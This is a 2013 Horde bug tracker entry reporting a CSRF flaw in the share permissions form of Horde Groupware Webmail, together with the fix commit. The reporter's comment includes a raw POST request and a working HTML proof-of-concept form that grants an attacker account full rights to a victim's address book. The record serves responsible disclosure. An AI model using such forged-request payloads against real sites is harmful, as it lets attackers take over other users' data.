6.0.0-git
2021-01-18

[#12804] CSRF in changing permissions functionality
Summary CSRF in changing permissions functionality
Queue Horde Groupware Webmail Edition
Queue Version 5.1.2
Type Bug
State Resolved
Priority 3. High
Owners jan (at) horde (dot) org
Requester m.benetrix (at) e-secure (dot) com (dot) au
Created 2013-10-28 (2639 days ago)
Due 11/05/2013 (2631 days ago)
Updated 2013-10-29 (2638 days ago)
Assigned
Resolved 2013-10-29 (2638 days ago)
Milestone
Patch No

History
2013-10-29 11:36:03 Jan Schneider Assigned to Jan Schneider
State ⇒ Resolved
 
2013-10-29 11:36:01 Git Commit Comment #2 Reply to this comment
Changes have been made in Git (master):

commit b79114d08ee8c8e43e74a179741749529f6d885c
Author: Jan Schneider <jan@horde.org>
Date:   Tue Oct 29 12:32:30 2013 +0100

     [jan] SECURITY: Protect against CSRF attacks on share permissions 
form (Bug #12804).

  horde/docs/CHANGES                  |    2 ++
  horde/package.xml                   |    4 +++-
  horde/services/shares/edit.php      |    5 +++++
  horde/templates/shares/edit.inc     |    1 +
  kronolith/docs/CHANGES              |    2 ++
  kronolith/package.xml               |    2 ++
  kronolith/perms.php                 |    5 +++++
  kronolith/templates/perms/perms.inc |    1 +
  8 files changed, 21 insertions(+), 1 deletions(-)

http://git.horde.org/horde-git/-/commit/b79114d08ee8c8e43e74a179741749529f6d885c
2013-10-28 23:18:33 m (dot) benetrix (at) e-secure (dot) com (dot) au Comment #1
Type ⇒ Bug
State ⇒ Unconfirmed
Priority ⇒ 3. High
Summary ⇒ CSRF in changing permissions functionality
Due ⇒ 2013-11-05
Queue ⇒ Horde Groupware Webmail Edition
Milestone ⇒
Patch ⇒ No
Reply to this comment
I found another one, a CSRF while a change of permissions is 
requested. It was found that this form misses a unique token

Request:
POST /horde/services/shares/edit.php HTTP/1.1
Host: victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101
Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: session=a0db6c30e697fe3da03f9f437a63bb3f
Content-Type: application/x-www-form-urlencoded
Content-Length: 252

actionID=editform&cid=37&app=turba&owner_input=kenedyK&u_names%5B%7C%7Cnew_input%5D=AttackerUserName&u_read%5B%7C%7Cnew_input%5D=on&u_edit%5B%7C%7Cnew_input%5D=on&u_delete%5B%7C%7Cnew_input%5D=on&g_names%5B%7C%7Cnew%5D=&save_and_finish=Save+and+Finish


PoC

<html>

   <body>
     <form action="www.victim.com/horde/services/shares/edit.php"
method="POST">
       <input type="hidden" name="actionID" value="editform" />
       <input type="hidden" name="cid" value="37" />
       <input type="hidden" name="app" value="turba" />
       <input type="hidden" name="owner&#95;input" value="kenedyK" />
       <input type="hidden"
name="u&#95;names&#91;&#124;&#124;new&#95;input&#93;"
value="AttackerUserName" />
       <input type="hidden"
name="u&#95;read&#91;&#124;&#124;new&#95;input&#93;" value="on" />
       <input type="hidden"
name="u&#95;edit&#91;&#124;&#124;new&#95;input&#93;" value="on" />
       <input type="hidden"
name="u&#95;delete&#91;&#124;&#124;new&#95;input&#93;" value="on" />
       <input type="hidden" name="g&#95;names&#91;&#124;&#124;new&#93;"
value="" />
       <input type="hidden" name="save&#95;and&#95;finish"
value="Save&#32;and&#32;Finish" />
       <input type="submit" value="Submit request" />
     </form>
   </body>
</html>


Conditions: The attacker must know the owner value which is the 
victim's username, and the ID of the address book. Once he gets them, 
he can launch the attack.

Saved Queries